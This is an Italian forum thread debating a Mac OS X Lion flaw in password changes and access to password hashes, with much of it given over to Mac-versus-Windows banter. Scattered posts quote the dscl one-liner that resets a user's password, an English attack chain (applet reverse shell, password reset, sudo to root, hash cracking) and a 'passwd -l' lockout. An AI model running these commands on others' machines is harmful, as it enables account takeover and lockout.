        Fra cretini e idioti quindi...

        Vedi se capitava a Windows come ci andavi giù di
        brutto... Ah ma il futuro login si baserà sui
        ferormoni
        ormai...Ehm ma windows già lo fa e ti fa cambiare anche quella degli altrinet user nomeutente passwordLuppolo questa l'avevi servita potevi evitare di dire baggianate
        • hermanhesse scrive:
          Re: Problema inesistente
          Se sei Administrator della macchina... perchè, non dovrebbe?
          • bertuccia scrive:
            Re: Problema inesistente
            - Scritto da: hermanhesse

            Se sei Administrator della macchina... perchè,
            non dovrebbe?giustissimo.il problema è che su x% delle macchine windows (7 compreso) esiste un solo utente ed è admin.per quel che vale, nella mia esperienza, questo x tende a essere grande
          • hermanhesse scrive:
            Re: Problema inesistente
            Se un problema di sicurezza deriva dall'utente, allora l'utente medio Apple (ormai, un tempo non era così) che scrive la password ovunque dobbiamo reputarlo un baco umano?
          • bertuccia scrive:
            Re: Problema inesistente
            - Scritto da: hermanhesse

            Se un problema di sicurezza deriva dall'utente,
            allora l'utente medio Apple (ormai, un tempo non
            era così) che scrive la password ovunque dobbiamo
            reputarlo un baco
            umano?cioè mi stai dicendo che se prendiamo 1000 utenti a caso che scrivono la password ovunque, troveremo una percentuale più alta di utenti mac?ho capito giusto?
          • hermanhesse scrive:
            Re: Problema inesistente
            Io non so se su mille utenti misti è così, ma mi basta vedere i grafici che ho qui... (ROTFL)
          • bertuccia scrive:
            Re: Problema inesistente
            - Scritto da: hermanhesse

            Io non so se su mille utenti misti è così, ma mi
            basta vedere i grafici che ho qui...
            (ROTFL)guarda penso che in molti ti potranno confermare che il postit appiccicato al monitor è prassi piuttosto comune per qualsiasi tipo di utonto.diciamo che sull'iMac ce ne stanno di più che su un monitor normale :D
          • hermanhesse scrive:
            Re: Problema inesistente
            Ti leggo un commento che ho letto ora sul blog di aranzulla:"gabri 26 agosto 2008 alle 11:19io ho un macbook pro mi sono dimentikata la password e quando inserisco il cd e remo C non succede nullaè molto urgenteFonte: http://aranzulla.tecnologia.virgilio.it/eliminare-la-password-di-acXXXXX-mac-752.html#ixzz1YZanwM7y"ehrrr....ehm....
          • panda rossa scrive:
            Re: Problema inesistente
            - Scritto da: bertuccia
            - Scritto da: hermanhesse



            Io non so se su mille utenti misti è così,
            ma
            mi

            basta vedere i grafici che ho qui...

            (ROTFL)

            guarda penso che in molti ti potranno confermare
            che il postit appiccicato al monitor è prassi
            piuttosto comune per qualsiasi tipo di
            utonto.

            diciamo che sull'iMac ce ne stanno di più che su
            un monitor normale
            :DPossibile che a Cupertino non abbiano ancora pensato ad un monitor con postit incorporati o comunque con uno spazio dedicato ad appuntare la password?Quasi quasi vado a brevettare l'idea?
          • hermanhesse scrive:
            Re: Problema inesistente
            Dimmi... e se perdo la password del sistema dove gira l'ambaradao come faccio?Ops... due neuroni che girano nello stesso senso no, vero Ruppolo? Non ce lafai proprio? L'importante è mostrare schermate colorate...
          • malto scrive:
            Re: Problema inesistente
            - Scritto da: bertuccia
            - Scritto da: hermanhesse



            Se sei Administrator della macchina...
            perchè,

            non dovrebbe?

            giustissimo.

            il problema è che su x% delle macchine windows (7
            compreso) esiste un solo utente ed è
            admin.
            Palle!Da Vista in avanti l'utente admin è nascosto, e l'utonto che collega la tastiera alla cadrega non lo è...
          • bertuccia scrive:
            Re: Problema inesistente
            - Scritto da: malto

            Palle!
            Da Vista in avanti l'utente admin è nascosto, e
            l'utonto che collega la tastiera alla cadrega non
            lo è...quando si tratta di far danni l'utonto è sempre avanti a tutti.. e va su google a cercare come si attiva l'account :D sennò ogni volta deve mettere la password, sai che palle! :Dsu google mi basta scrivere "attivare a" e già compare il suggerimento
          • ruppolo scrive:
            Re: Problema inesistente
            - Scritto da: malto
            - Scritto da: bertuccia

            - Scritto da: hermanhesse





            Se sei Administrator della macchina...

            perchè,


            non dovrebbe?



            giustissimo.



            il problema è che su x% delle macchine
            windows
            (7

            compreso) esiste un solo utente ed è

            admin.


            Palle!
            Da Vista in avanti l'utente admin è nascosto, e
            l'utonto che collega la tastiera alla cadrega non
            lo
            è...Ininfluente, visto che la maggior parte usa XP.
          • vintage scrive:
            Re: Problema inesistente
            - Scritto da: bertuccia
            - Scritto da: hermanhesse



            Se sei Administrator della macchina...
            perchè,

            non dovrebbe?

            giustissimo.

            il problema è che su x% delle macchine windows (7
            compreso) esiste un solo utente ed è
            admin.

            per quel che vale, nella mia esperienza, questo x
            tende a essere
            grandeSono due cose diverse,un conto è una debolezza del sistemaun altro perchè l' utente è utonto
        • eleirbag scrive:
          Re: Problema inesistente
          Ma non diciamo Baggianate per cortesia.Da Win 2000 in poi, per poter cambiarela password di qualsiasi utente facenteparter del gruppo Administrators, bisognafare parte dello stesso gruppo altrimentiil sistema ti blocca, giustamente.Poi cosa c'entra Windows in sto discorso ?
          • ruppolo scrive:
            Re: Problema inesistente
            - Scritto da: eleirbag
            Ma non diciamo Baggianate per cortesia.
            Da Win 2000 in poi, per poter cambiare
            la password di qualsiasi utente facente
            parter del gruppo Administrators, bisogna
            fare parte dello stesso gruppo altrimenti
            il sistema ti blocca, giustamente.E per quale ragione non dovrebbero far parte dello stesso gruppo?
            Poi cosa c'entra Windows in sto discorso ?Forse che Windows ha da sempre questo problema, e che forse non è un grosso problema, visto che sta lì da 10 anni.
          • eleirbag scrive:
            Re: Problema inesistente
            - Scritto da: ruppolo
            - Scritto da: eleirbag

            Ma non diciamo Baggianate per cortesia.

            Da Win 2000 in poi, per poter cambiare

            la password di qualsiasi utente facente

            parter del gruppo Administrators, bisogna

            fare parte dello stesso gruppo altrimenti

            il sistema ti blocca, giustamente.

            E per quale ragione non dovrebbero far parte
            dello stesso
            gruppo??!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?Ehhhm, per la stessa ragione che esistono i permessie i privilegi e i vari gruppi e utenti con potenzialitàdifferenti. Nemmeno quando fai parte del gruppo degliAdministrators sei l'amministratore.Dunque come in tutti i sistemi *nix, MacOSX compreso,ha senso solo e sempre usare l'utente come gruppo usere dare la password di Administrator solo quando devifare qualcosa di potenzialmente pericolo al sisteme.Ma insomm questo è l'ABC dell'informatica anche suApple.


            Poi cosa c'entra Windows in sto discorso ?

            Forse che Windows ha da sempre questo problema, e
            che forse non è un grosso problema, visto che sta
            lì da 10
            anni.Ehhhhhhhh ?Mai sai almeno di cosa stai parlando ?Windows con lo stesso problema ?Mi sa che dovresti documentarti prima di postare, lodico per te. :-/
          • ruppolo scrive:
            Re: Problema inesistente
            - Scritto da: eleirbag
            - Scritto da: ruppolo

            - Scritto da: eleirbag


            Ma non diciamo Baggianate per cortesia.


            Da Win 2000 in poi, per poter cambiare


            la password di qualsiasi utente facente


            parter del gruppo Administrators,
            bisogna


            fare parte dello stesso gruppo
            altrimenti


            il sistema ti blocca, giustamente.



            E per quale ragione non dovrebbero far parte

            dello stesso

            gruppo?

            ?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!
            Ehhhm, per la stessa ragione che esistono i
            permessi
            e i privilegi e i vari gruppi e utenti con
            potenzialità
            differenti. Nemmeno quando fai parte del gruppo
            degli
            Administrators sei l'amministratore.
            Dunque come in tutti i sistemi *nix, MacOSX
            compreso,
            ha senso solo e sempre usare l'utente come gruppo
            user
            e dare la password di Administrator solo quando
            devi
            fare qualcosa di potenzialmente pericolo al
            sisteme.
            Ma insomm questo è l'ABC dell'informatica anche su
            Apple.L'ABC dell'informatica, nonché la Legge italiana (allegato B punto 12 all'Art. 34, comma C, Legge n. 188 del 27 Luglio 2004) prevede (nell'ipotesi da te citata) che vi sia un SISTEMA di autenticazione delle credenziali di acXXXXX, quindi il problema non si pone.






            Poi cosa c'entra Windows in sto
            discorso
            ?



            Forse che Windows ha da sempre questo
            problema,
            e

            che forse non è un grosso problema, visto
            che
            sta

            lì da 10

            anni.

            Ehhhhhhhh ?
            Mai sai almeno di cosa stai parlando ?
            Windows con lo stesso problema ?
            Mi sa che dovresti documentarti prima di postare,
            lo
            dico per te. :-/Probabile, ma visto che lo hanno scritto in migliaia di persone, forse non sono l'unico a dover documentarsi...
      • ruppolo scrive:
        Re: Problema inesistente
        - Scritto da: jepessen
        Fra cretini e idioti quindi...

        Vedi se capitava a Windows come ci andavi giù di
        brutto... Ho letto un po' ovunque, ma non ho approfondito, che su Windows XP (il sistema più usato) è sempre stato così. Ma tanto tutti i PC con XP che ho visto arrivano subito al desktop, quando accesi, senza chiedere password.
    • Teo_ scrive:
      Re: Problema inesistente
      - Scritto da: ruppolo
      Gli utenti Mac si dividono grosso modo in 2
      categorie:

      Quelli che la password non la vogliono, e quindi
      il sistema non chiede alcuna password, e quelli
      che invece hanno pensato alla sicurezza e hanno
      disabilitato il login
      automatico.Sai come si comporta Lion in uninstallazione da zero (intendo da pen drive)? Consente di non inserire password? Di default propone il login automatico?Sono 8-9 anni che mi porto dietro utenti e settaggi al cambio di sistema/macchina e mi ritrovo a scelte già fatte...
    • TheOriginalFanboy scrive:
      Re: Problema inesistente
      sondaggione: io ho disabilitato il login automatico, e protetto screensaver con password
      • bertuccia scrive:
        Re: Problema inesistente
        - Scritto da: TheOriginalFanboy

        sondaggione: io ho disabilitato il login
        automatico, e protetto screensaver con
        passwordva bè ma qua è ovvio che tutti avranno fatto sta scelta..ed è la scelta di chi è un minimo consapevolel'utente medio invece, come dice ruppolo, lascia il login automatico, nessuna password richiestaalmeno questo è ciò che ho constatato nella mia esperienza
        • hermanhesse scrive:
          Re: Problema inesistente
          Quale parte di "esiste un pericolo dal web" non è chiara???A user with administrative rights is browsing the internet with Safari. The user happens to browse to a website hosting a malicious Java Applet. Unbeknownst to the user, they allow the innocent looking Java Applet to run. The Applet will proceed to make a connection back to the attacker, providing the attacker with full shell access. Whilst the attacker has access to the system, they are provided only with limited user privileges (they still do not have root access). This would limit what an attacker could accomplish. However, with the vulnerabilities described above the attacker now has an advantage: they can change the password of the current user. Now remember, the current user is an administrator. So now all the attacker has to do is sudo s to become root. If lets say the victim did not have administrative rights, the attacker still has the ability to extract user hashes from the system and attempt to crack them.
          • bertuccia scrive:
            Re: Problema inesistente
            - Scritto da: hermanhesse

            Quale parte di "esiste un pericolo dal web" non è
            chiara???ho appena letto l'altro tuo post.messa così non è proprio liquidabile come una bazzecola :$
          • hermanhesse scrive:
            Re: Problema inesistente
            Ti stimo: perchè per una volta hai evitato di fare come invece sta facendo Ruppolo.Dico sul serio.
          • Gabriele scrive:
            Re: Problema inesistente
            - Scritto da: hermanhesse
            Quale parte di "esiste un pericolo dal web" non è
            chiara???
            [snip]Questo solo se:1) Mac collegato ad internet con router "tutto aperto" &2) Mac con firewall disabilitato.Altrimenti spiegami come fai dall'esterno a collegarti, mica che l'applet apre da sé le porte sul router e disabilita il FW, mica siamo su Windows ;)G.
          • hermanhesse scrive:
            Re: Problema inesistente
            Una applet che gira e che permetta di fare una shell limitata nella sandbox di Safari è sufficiente per fare questo lavoro, oppure per ciucciarsi le password shadowate.
          • Gabriele scrive:
            Re: Problema inesistente
            - Scritto da: hermanhesse
            Una applet che gira e che permetta di fare una
            shell limitata nella sandbox di Safari è
            sufficiente per fare questo lavoro, oppure per
            ciucciarsi le password
            shadowate.Anche fosse, poi dove le manda se le connessioni in uscita sono chiuse o non permesse? L'applet comunque chiederà autorizzazione, immagino, per l'esecuzione e poi hai il FW di OSX e del router.Son d'accordo comunque che è un bug da risolvere, ma non credo sia sfruttabile nel mondo reale nel modo in cui è stato pubblicizzato.G.
          • hermanhesse scrive:
            Re: Problema inesistente
            Se sfrutta la porta 80 per fare streaming dei dati / passa il risultato ad un javascript che spara i dati via ajax la cosa è fattibile.La applet (mi sono informato) deve essere signed (come qualcuno ha scritto) per poter lanciare comandi shell.
          • Darwin scrive:
            Re: Problema inesistente
            Beh ipfw è disattivato di default e Application Firewall è un giocattolo inutile.Direi quindi che dal punto di vista della protezione Mac OS X è a dir poco lassivo.
        • Darwin scrive:
          Re: Problema inesistente
          Certo...se ti bucano via internet, prima ti fottono con passwd cambiando la tua password e poi con un passwd -l per bloccarne le modifiche.Quanti utenti Apple sanno dare passwd -u per sbloccare il tutto e poi ripristinare la password?UNIX non è un giocattolo: o lo sai usare o è meglio che cambi aria.-----------------------------------------------------------Modificato dall' autore il 25 settembre 2011 13.40-----------------------------------------------------------
      • Tony scrive:
        Re: Problema inesistente
        Idem!
    • FridayChild scrive:
      Re: Problema inesistente
      Sembra una boutade, ma è così che ragiona Apple in effetti.Quello che il loro utente-tipo non considera importante, loro lo considerano alla stessa stregua.E attenzione, sto parlando di utente-tipo, quindi non s'inalberino i Mac-geek, che sono atipici ;)
    • hermanhesse scrive:
      Re: Problema inesistente
      Sai che ce n'era già uno minimizzava i problemi delle persone così e che negava la verità per una ideologia? Lo hanno appeso a testa in giù...
    • gnammolo scrive:
      Re: Problema inesistente
      e rompiamo il termometro se segna febbre! che razza di consulente sei!
    • ciccio pasticcio quello vero scrive:
      Re: Problema inesistente
      - Scritto da: ruppolo
      Gli utenti Mac si dividono grosso modo in 2
      categorie:

      Quelli che la password non la vogliono, e quindi
      il sistema non chiede alcuna password, e quelli
      che invece hanno pensato alla sicurezza e hanno
      disabilitato il login
      automatico.

      Quindi il problema non si pone.si però c'è il problema degli utonti, che sono poi il 99% abbondante degli user mac, che appunto non hanno disabilitato il login automatico.E' alla radice, il problema.. e non lo risolvi facendo un sistema operativo con il launchpad, anzi.
      • Tony scrive:
        Re: Problema inesistente
        - Scritto da: ciccio pasticcio quello vero
        - Scritto da: ruppolo

        Gli utenti Mac si dividono grosso modo in 2

        categorie:



        Quelli che la password non la vogliono, e
        quindi

        il sistema non chiede alcuna password, e
        quelli

        che invece hanno pensato alla sicurezza e
        hanno

        disabilitato il login

        automatico.



        Quindi il problema non si pone.

        si però c'è il problema degli utonti, che sono
        poi il 99% abbondante degli user mac, che appunto
        non hanno disabilitato il login
        automatico.
        E' alla radice, il problema.. e non lo risolvi
        facendo un sistema operativo con il launchpad,
        anzi.Al massimo è al contrario. Il login automatico è disabilitato al primo avvio o all'installazione. Semmai l'utente deve disabilitarlo di sua iniziativa.
  • Elettore vicino a pentirsi scrive:
    Per cambiare password utente corrente
    "Per cambiare la password dell'utente corrente", spiega Dunstan, "basta usare: $ dscl localhost -passwd /Search/Users/nomeutente". L'altro problema risiede risiede nell'acXXXXX agli hash delle password degli altri utenti registrati sul sistema, registrati nei cosiddetti "shadow file" e accessibili a tutti gli utenti indipendentemente dai privilegi di acXXXXX di cui sono dotati.Calma calma nessun problema!A. l'utente medio MAC non sa neanche che esiste la consol (quel quadratino nero nero fa troppa paura, brrrrr)B. digitare "dscl localhost -passwd /Search/Users/nomeutente" e' troppo difficile, arrivati a "/Use" gli scoppia la testa, SBEMMM (poi hai voglia a ripulire il monitor da pezzetti di cervello, ossa, toh, qui c'e' pure un occhio e due denti...)C. inutile cambiare password, di solito e' "nomeutente" oppure "jobsiloveyou"
    • Paolo T. scrive:
      Re: Per cambiare password utente corrente

      A. l'utente medio MAC non sa neanche che esiste
      la consol (quel quadratino nero nero fa troppa
      paura,Eh beh, certo, su Windows invece stanno tutti sempre sulla linea di comando...
      • Legione scrive:
        Re: Per cambiare password utente corrente
        - Scritto da: Paolo T.

        A. l'utente medio MAC non sa neanche che
        esiste

        la consol (quel quadratino nero nero fa
        troppa

        paura,

        Eh beh, certo, su Windows invece stanno tutti
        sempre sulla linea di
        comando...Più di quanto pensi ... Almeno i vecchi utenti
        • panda rossa scrive:
          Re: Per cambiare password utente corrente
          - Scritto da: Legione
          - Scritto da: Paolo T.


          A. l'utente medio MAC non sa neanche che

          esiste


          la consol (quel quadratino nero nero fa

          troppa


          paura,



          Eh beh, certo, su Windows invece stanno tutti

          sempre sulla linea di

          comando...
          Più di quanto pensi ... Almeno i vecchi utenti...o quelli che glielo hanno imposto e ci devono lavorare.
        • kaiserxol scrive:
          Re: Per cambiare password utente corrente
          Diglielo và...start+R è la mia combinazione preferita!
          • Funz scrive:
            Re: Per cambiare password utente corrente
            - Scritto da: kaiserxol
            Diglielo và...start+R è la mia combinazione
            preferita!fica... non la sapevo! (anonimo) :D :$
    • Danielecant i scrive:
      Re: Per cambiare password utente corrente
      E questa penso sia l'unica che non fa ridere... ma nemmeno ad impegnarsi eh
      • ... scrive:
        Re: Per cambiare password utente corrente
        - Scritto da: Danielecant i
        E questa penso sia l'unica che non fa ridere...
        ma nemmeno ad impegnarsi
        ehhai paura che ti esploda il cervello, eh? :)
  • Ruppolo scrive:
    Conrinuo a Pentirmi
    Continuo a Pentirmi di aver comprato un mac adesso scopro che ci sono anche problemi con le password è relativa sicurezza. Basta mac e mac os X ritorno a Windows li si che le password sono veramente al sicuro!!
    • Just ATroll scrive:
      Re: Conrinuo a Pentirmi
      No dai, non iniziare a scrivere post seri adesso. Continua come hai fatto fino ad ora.
      • sbrotfl scrive:
        Re: Conrinuo a Pentirmi
        - Scritto da: Just ATroll
        No dai, non iniziare a scrivere post seri adesso.
        Continua come hai fatto fino ad
        ora.Non è il vero ruppolo... sto clone cinese non è registrato
    • Darwin scrive:
      Re: Conrinuo a Pentirmi
      Devi impegnarti se vuoi assomigliare a ruppolo.Ora sei solo una sua copia scarsa.
  • hp fiasco scrive:
    è una feature
    in ogni caso va tenuto conto che su qualunque su qualunque dispositivo apple si stia cambiando la pwd sfruttando questa vulnerabilità ..... questo dispositivo NON VIENE IMPUGNATO CORRETTAMENTE, quindi il problema non esiste,se poi vogliamo essere pignoli ... non è un baco è una feature .. metti che ti scordassi la password ... puoi sempre ricavarla e/o cambiarlasu xp devi bruciare un cd per installaci sopra l'apposita distribuzione linux ... riavviare col cd, per poi accorgerti che non ti ricordi + i comandi da digitare, riavviare window .. ricollegarti ad internet .. fare copia e incolla A PENNA su un foglio della stringa da cambiare, riavviare il pc con il cd ... provare a digitare almeno 7 volte il comando con tutte le combinazioni di maiuscole/minuscole e spazi .. e se sei fortunato ci riescimac os è basato su unix ... e quindi hanno risolto il problema alla radice! it's magic......... ed io mi sto ammazzando dalle risate da due giorni!
    • PuzzettaSoporifera scrive:
      Re: è una feature
      Su MacOs 10.8 la password non ci sarà più.Per evitare che chi se la dimentica debba avere problemi.Its magic! (rotfl)
      • prova123 scrive:
        Re: è una feature
        Per fortuna che è poco diffuso a livello aziendale. Per chi lavora, al di là del tipo di lavoro, la sicurezza dei dati è importante quanto gli stessi dati. Che dire, sempre più Clementoni ...
    • eleirbag scrive:
      Re: è una feature
      Sono ancora che rido per il tuo post!!!;-D
  • PuzzettaSoporifera scrive:
    E ma mac è figo
    AHAHAHHAHAHAHAHAHA HAHAHAHHAHAHAHAHAHAHA.(rotfl)(rotfl)(rotfl)(linux)
  • accher scrive:
    accaggio
    domani vado in un apple store e cambio la psw a tutti i mac accesi in esposizione. che accher!
  • eleirbag scrive:
    Azz che figura!
    :-(:-(:-(
    • atarilover sloggata scrive:
      Re: Azz che figura!
      Vabbé non è poi così grave, se lasci il mac incustodito penso che il problema più grave sia se te lo rubano...
      • panda rossa scrive:
        Re: Azz che figura!
        - Scritto da: atarilover sloggata
        Vabbé non è poi così grave, se lasci il mac
        incustodito penso che il problema più grave sia
        se te lo
        rubano...Se lo lasci incustodito al bar...
        • atarilover sloggata scrive:
          Re: Azz che figura!
          - Scritto da: panda rossa
          - Scritto da: atarilover sloggata

          Vabbé non è poi così grave, se lasci il mac

          incustodito penso che il problema più grave
          sia

          se te lo

          rubano...

          Se lo lasci incustodito al bar...(rotfl)
      • nome e cognome scrive:
        Re: Azz che figura!
        - Scritto da: atarilover sloggata
        Vabbé non è poi così grave, se lasci il mac
        incustodito penso che il problema più grave sia
        se te lo
        rubano...Pensa se in ufficio ti fanno lo scherzone e lo bloccano prima di una presentazione importante...
        • panda rossa scrive:
          Re: Azz che figura!
          - Scritto da: nome e cognome
          - Scritto da: atarilover sloggata

          Vabbé non è poi così grave, se lasci il mac

          incustodito penso che il problema più grave
          sia

          se te lo

          rubano...

          Pensa se in ufficio ti fanno lo scherzone e lo
          bloccano prima di una presentazione
          importante......o meglio ancora, durante!
Chiudi i commenti